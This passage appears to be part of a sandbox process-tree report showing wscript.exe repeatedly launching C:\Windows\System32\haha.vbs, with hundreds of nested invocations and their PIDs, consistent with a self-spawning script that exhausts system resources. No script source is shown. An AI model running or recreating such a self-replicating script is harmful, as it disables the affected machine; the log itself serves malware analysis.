        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        313⤵
        
        PID:15892
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        314⤵
        
        PID:15928
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        315⤵
        
        PID:15964
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        316⤵
        
        PID:16000
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        317⤵
        
        PID:16040
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        318⤵
        
        PID:16076
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        319⤵
        
        PID:16120
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        320⤵
        
        PID:16160
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        321⤵
        
        PID:16196
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        322⤵
        
        PID:16232
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        323⤵
        
        PID:16268
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        324⤵
        
        PID:16304
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        325⤵
        
        PID:16344
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        326⤵
        
        PID:16376
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        327⤵
        
        PID:15580
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        328⤵
        
        PID:15872
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        329⤵
        
        PID:2404
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        330⤵
        
        PID:5436
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        331⤵
        
        PID:15796
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        332⤵
        
        PID:16408
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        333⤵
        
        PID:16444
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        334⤵
        
        PID:16480
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        335⤵
        
        PID:16520
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        336⤵
        
        PID:16556
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        337⤵
        
        PID:16600
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        338⤵
        
        PID:16652
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        339⤵
        
        PID:16692
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        340⤵
        
        PID:16728
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        341⤵
        
        PID:16764
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        342⤵
        
        PID:16800
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        343⤵
        
        PID:16836
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        344⤵
        
        PID:16880
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        345⤵
        
        PID:16912
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        346⤵
        
        PID:16956
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        347⤵
        
        PID:16988
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        348⤵
        
        PID:17028
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        349⤵
        
        PID:17068
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        350⤵
        
        PID:17104
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        351⤵
        
        PID:17140
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        352⤵
        
        PID:17184
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        353⤵
        
        PID:17216
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        354⤵
        
        PID:17260
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        355⤵
        
        PID:17292
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        356⤵
        
        PID:17328
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        357⤵
        
        PID:17364
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        358⤵
        
        PID:17404
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        359⤵
        
        PID:2212
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        360⤵
        
        PID:16868
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        361⤵
        
        PID:17132
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        362⤵
        
        PID:16548
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        363⤵
        
        PID:17432
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        364⤵
        
        PID:17468
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        365⤵
        
        PID:17504
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        366⤵
        
        PID:17580
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        367⤵
        
        PID:17632
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        368⤵
        
        PID:17672
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        369⤵
        
        PID:17732
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        370⤵
        
        PID:17780
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        371⤵
        
        PID:17832
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        372⤵
        
        PID:17888
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        373⤵
        
        PID:17936
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        374⤵
        
        PID:17988
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        375⤵
        
        PID:18036
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        376⤵
        
        PID:18104
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        377⤵
        
        PID:18140
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        378⤵
        
        PID:18212
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        379⤵
        
        PID:18264
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        380⤵
        
        PID:18308
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        381⤵
        
        PID:18384
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        382⤵
        
        PID:6432
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        383⤵
        
        PID:17560
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        384⤵
        
        PID:17724
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        385⤵
        
        PID:2148
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        386⤵
        
        PID:17904
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        387⤵
        
        PID:18096
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        388⤵
        
        PID:18156
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        389⤵
        
        PID:18172
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        390⤵
        
        PID:18376
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        391⤵
        
        PID:17544
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        392⤵
        
        PID:17540
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        393⤵
        
        PID:18148
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        394⤵
        
        PID:892
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        395⤵
        
        PID:18440
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        396⤵
        
        PID:18484
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        397⤵
        
        PID:18516
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        398⤵
        
        PID:18552
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        399⤵
        
        PID:18596
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        400⤵
        
        PID:18632
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        401⤵
        
        PID:18680
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        402⤵
        
        PID:18720
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        403⤵
        
        PID:18756
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        404⤵
        
        PID:18804
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        405⤵
        
        PID:18844
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        406⤵
        
        PID:18888
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        407⤵
        
        PID:18932
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        408⤵
        
        PID:18984
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        409⤵
        
        PID:19032
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        410⤵
        
        PID:19080
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        411⤵
        
        PID:19120
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        412⤵
        
        PID:19188
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        413⤵
        
        PID:19228
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        414⤵
        
        PID:19284
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        415⤵
        
        PID:19332
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        416⤵
        
        PID:19380
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        417⤵
        
        PID:19424
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        418⤵
        
        PID:2872
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        419⤵
        
        PID:18624
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        420⤵
        
        PID:7144
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        421⤵
        
        PID:19220
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        422⤵
        
        PID:19112
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        423⤵
        
        PID:19464
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        424⤵
        
        PID:19508
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        425⤵
        
        PID:19552
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        426⤵
        
        PID:19596
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        427⤵
        
        PID:19644
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        428⤵
        
        PID:19692
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        429⤵
        
        PID:19732
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        430⤵
        
        PID:19776
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        431⤵
        
        PID:19820
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        432⤵
        
        PID:19876
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        433⤵
        
        PID:19924
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        434⤵
        
        PID:19972
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        435⤵
        
        PID:20032
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        436⤵
        
        PID:20104
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        437⤵
        
        PID:20152
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        438⤵
        
        PID:20216
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        439⤵
        
        PID:20284
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        440⤵
        
        PID:20336
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        441⤵
        
        PID:20388
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        442⤵
        
        PID:20460
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        443⤵
        
        PID:19768
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        444⤵
        
        PID:8352
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        445⤵
        
        PID:8688
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        446⤵
        
        PID:20380
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        447⤵
        
        PID:8156
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        448⤵
        
        PID:20488
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        449⤵
        
        PID:20544
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        450⤵
        
        PID:20648
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        451⤵
        
        PID:20716
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        452⤵
        
        PID:20780
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        453⤵
        
        PID:20856
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        454⤵
        
        PID:20904
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        455⤵
        
        PID:20968
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        456⤵
        
        PID:21012
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        457⤵
        
        PID:21092
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        458⤵
        
        PID:21148
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        459⤵
        
        PID:21224
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        460⤵
        
        PID:21312
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        461⤵
        
        PID:21372
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        462⤵
        
        PID:21424
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        463⤵
        
        PID:21484
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        464⤵
        
        PID:9768
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        465⤵
        
        PID:20596
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        466⤵
        
        PID:20912
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        467⤵
        
        PID:9420
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        468⤵
        
        PID:10444
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        469⤵
        
        PID:9536
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        470⤵
        
        PID:6068
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        471⤵
        
        PID:20812
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        472⤵
        
        PID:10156
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        473⤵
        
        PID:21584
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        474⤵
        
        PID:21768
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        475⤵
        
        PID:21820
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        476⤵
        
        PID:21884
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        477⤵
        
        PID:21932
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        478⤵
        
        PID:22004
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        479⤵
        
        PID:22100
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        480⤵
        
        PID:22280
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        481⤵
        
        PID:22328
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        482⤵
        
        PID:22448
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        483⤵
        
        PID:21660
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        484⤵
        
        PID:21732
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        485⤵
        
        PID:21968
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        486⤵
        
        PID:22336
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        487⤵
        
        PID:22512
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        488⤵
        
        PID:22200
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        489⤵
        
        PID:22088
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        490⤵
        
        PID:22040
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        491⤵
        
        PID:21636
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        492⤵
        
        PID:4312
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        493⤵
        
        PID:22048
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        494⤵
        
        PID:11396
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        495⤵
        
        PID:21724
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        496⤵
        
        PID:11800
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        497⤵
        
        PID:12248
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        498⤵
        
        PID:22640
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        499⤵
        
        PID:22776
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        500⤵
        
        PID:22840
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        501⤵
        
        PID:22984
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        502⤵
        
        PID:23028
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        503⤵
        
        PID:23160
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        504⤵
        
        PID:23200
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        505⤵
        
        PID:23332
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        506⤵
        
        PID:23432
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        507⤵
        
        PID:23472
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        508⤵
        
        PID:23532
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        509⤵
        
        PID:22540
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        510⤵
        
        PID:22592
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        511⤵
        
        PID:22672
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        512⤵
        
        PID:22724
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        513⤵
        
        PID:12516
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        514⤵
        
        PID:22904
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        515⤵
        
        PID:22948
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        516⤵
        
        PID:23064
        
        C:\Windows\System32\wscript.exe
        
        "C:\Windows\System32\wscript.exe" C:\Windows\System32\haha.vbs
        517⤵
        
        PID:23100
        
        C:\Windows\System32\wscript.exe
        
